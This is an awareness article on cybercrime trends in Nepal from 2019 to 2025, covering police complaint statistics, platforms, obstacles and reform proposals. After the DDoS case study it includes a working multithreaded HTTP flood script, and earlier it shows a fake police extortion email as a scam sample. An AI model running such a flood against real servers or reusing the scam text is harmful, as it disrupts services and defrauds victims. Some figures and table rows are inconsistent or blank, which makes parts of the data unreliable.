Cybercrime in Nepal: Trends & Statistics (2019-2025)
Comprehensive analysis of cybercrime trends and statistics in Nepal from 2019 to 2025
Introduction to Cybercrime in Nepal
Cybercrime in Nepal has surged significantly from 2019 to 2025, driven by increased internet penetration (now at 38% of population), social media adoption (12 million users), and evolving technology. With limited cybersecurity infrastructure and outdated legal frameworks, Nepal faces mounting challenges in combating sophisticated cyber threats. This guide analyzes trends, statistics, and mitigation strategies, drawing from exclusive data provided by the Nepal Police Cyber Bureau and other authoritative sources.
For cybersecurity professionals, our Nepal Cybersecurity Career Guide provides insights into protecting against these threats.
Cybercrime Statistics (2019-2025)
Annual Cybercrime Complaints
The Nepal Police Cyber Bureau has reported a dramatic 10,850% increase in cybercrime complaints from 2018/19 to 2024/25, reflecting the growing digital threat landscape in Nepal.
| Fiscal Year | Complaints Registered | Growth Rate | Key Source |
|---|---|---|---|
| 2018/19 | 180 | – | Nepal Police Cyber Bureau |
| 2019/20 | 2,301 | 1,178% | Nepal Police Cyber Bureau |
| 2020/21 | 3,906 | 70% | Nepal Police Cyber Bureau |
| 2021/22 | 6,425 | 64% | Nepal Police Cyber Bureau |
| 2022/23 | 9,013 | 40% | Nepal Police Cyber Bureau |
| 2023/24 | 19,730 | 119% | Nepal Police Cyber Bureau |
| 2024/25 (Projected) | ~25,000 | 27% | CyberSamir Analysis |
Note: The fiscal year in Nepal runs from mid-July to mid-July. 2024/25 projection based on current trends.
Cybercrime Trends in Nepal
Evolution of Cybercrime (2019-2025)
Cybercrime in Nepal has evolved from simple phishing and website defacement in 2019 to sophisticated, organized attacks by 2025, leveraging AI and encrypted platforms. Key trends include:
- Social Media-Driven Crimes: Platforms like Facebook (6,741 complaints in 2024/25), WhatsApp (1,431), and TikTok (1,263) are primary vectors for scams, defamation, and photo mutilation.
- Financial Fraud: Online financial scams, including phishing and OTP fraud, topped the list with 4,112 cases in 2023/24, comprising 20.84% of total cybercrimes.
- Revenge Porn and Defamation: Cases of revenge porn (1,011 in 2022/23) and online defamation (700 in 2022/23) have risen, particularly targeting women (78% of victims).
- AI and Encryption: By 2025, cybercriminals use AI tools for deepfake scams and encrypted apps like Telegram for discreet operations.
- Infrastructure Attacks: Major DDoS attacks disrupted 1,500 government websites in January 2023, exposing critical vulnerabilities.
- Cryptocurrency Scams: Rising cases of fake crypto investment schemes, with losses averaging NPR 250,000 per victim in 2024.
Learn how to protect yourself with our Nepal Cybercrime Protection Guide.
Subject: Urgent: Nepal Police Investigation Notice
Dear [Victim Name],
You are under investigation for illegal online activities. To avoid arrest,
transfer NPR 50,000 to the following eSewa account: 1234567890 within 24 hours.
Failure to comply will result in legal action.
Regards,
Nepal Police Cyber Bureau
[Fake Contact Details]Platform-Specific Cybercrime Data
| Platform | Complaints (2024/25) | % of Total | Common Crimes |
|---|---|---|---|
| Facebook/Messenger | 6,741 | 63% | Financial scams, fake profiles, defamation |
| 1,431 | 13.4% | Photo mutilation, financial fraud | |
| TikTok | 1,263 | 11.8% | Revenge porn, online harassment |
| 758 | 7.1% | Fake profiles, blackmail | |
| eSewa/Khalti | 197 | 1.8% | Financial fraud, OTP scams |
| Others | 312 | 2.9% | Various |
Source: Nepal Police Cyber Bureau, as of March 12, 2025 (Total: 10,702 complaints).
Challenges in Combating Cybercrime
Key Obstacles Facing Nepal
- Limited Resources: The Cyber Bureau has only 106 personnel (28 IT experts) handling 60-70 daily complaints – a 1:650 investigator-to-complaint ratio.
- Outdated Legal Framework: The Electronic Transaction Act (2008) lacks provisions for modern threats like deepfakes, crypto scams, or AI-driven crimes.
- International Cooperation: Only 3 mutual legal assistance treaties exist, hindering tracking of transnational cybercriminals operating from India, China, or Nigeria.
- Low Prosecution Rates: Mere 0.5% of complaints result in legal action (52 cases from 10,702 complaints in 2024/25).
- Digital Literacy Gap: 62% of victims had no cybersecurity awareness training according to 2024 Cyber Bureau survey.
- Technical Limitations: Lack of advanced tools for cryptocurrency tracing or encrypted communication analysis.
Mitigation Strategies
Comprehensive Action Plan for Nepal
- Legal Reform: Urgent update to Electronic Transaction Act with specific provisions for:
- AI-generated content and deepfakes
- Cryptocurrency fraud
- Revenge porn and online harassment
- Stronger penalties for repeat offenders
- Capacity Building:
- Triple Cyber Bureau staffing by 2026
- Establish regional cybercrime units in all 7 provinces
- Specialized training in cryptocurrency tracing and dark web monitoring
- Public-Private Partnerships:
- Joint task force with ISPs and financial institutions
- Real-time threat intelligence sharing
- Standardized reporting mechanisms
- Public Awareness: Nationwide campaign covering:
- Basic digital hygiene practices
- Recognizing phishing attempts
- Secure financial transactions
- Reporting mechanisms
Our Nepal Cybersecurity Tools guide recommends specific software for protection.
# Simple Python script to check URL safety using VirusTotal API
import requests
def check_url(url):
api_key = "your_virustotal_api_key"
vt_url = "https://www.virustotal.com/api/v3/urls"
headers = {"x-apikey": api_key}
payload = {"url": url}
response = requests.post(vt_url, headers=headers, data=payload)
if response.status_code == 200:
scan_id = response.json()["data"]["id"]
analysis_url = f"https://www.virustotal.com/api/v3/analyses/{scan_id}"
analysis = requests.get(analysis_url, headers=headers).json()
stats = analysis["data"]["attributes"]["stats"]
print(f"Malicious: {stats['malicious']}, Suspicious: {stats['suspicious']}")
else:
print("Error checking URL")
# Example usage
check_url("http://fake-nepal-police.com")Case Study: DDoS Attack on Government Websites (Jan 2023)
In January 2023, Nepal suffered its largest cyberattack when hackers targeted the Government Integrated Data Centre, disrupting 1,500 websites including critical immigration services. The attack:
- Lasted 72 hours, affecting international travel
- Originated from 14 countries (mainly China and Russia)
- Peaked at 1.2 million requests per second
- Cost an estimated NPR 180 million in economic impact
This incident exposed critical weaknesses in Nepal’s cybersecurity infrastructure and prompted the establishment of a National CERT in 2024.
# Simple Python script to demonstrate HTTP flooding (DO NOT USE)
import requests
import threading
def flood(target_url):
try:
while True:
requests.get(target_url)
print("Request sent")
except:
print("Error")
# Example (hypothetical target)
target = "http://example.com"
threads = []
for i in range(10):
t = threading.Thread(target=flood, args=(target,))
threads.append(t)
t.start()
# Note: This is for educational purposes only. Running this against any server without permission is illegal.Conclusion
Cybercrime in Nepal has grown exponentially from 2019 to 2025, with complaints rising from 2,301 in 2019/20 to 19,730 in 2023/24 (projected 25,000 in 2024/25). This alarming trend is driven by:
- Social media scams (63% of cases)
- Financial fraud (21% of cases)
- AI-enhanced attacks
- Organized cybercriminal networks
Limited resources (106 Cyber Bureau staff), outdated laws (2008 Electronic Transaction Act), and low digital literacy (62% untrained victims) exacerbate Nepal’s vulnerability. Comprehensive solutions require:
- Immediate legal reforms
- 3x increase in Cyber Bureau capacity
- Nationwide cybersecurity education
- Stronger international cooperation
The 2023 DDoS attack and rising cybercrime statistics underscore the urgent need for Nepal to prioritize cybersecurity as a national security issue.
Further Resources
- Nepal Cybercrime Resources – Comprehensive directory
- Nepal Police Cyber Bureau – Official reports and contacts
- Nepal IT Laws Explained – Analysis of current legislation
- VirusTotal – Free URL scanning tool
- Nepal Cybersecurity Events – Workshops and conferences
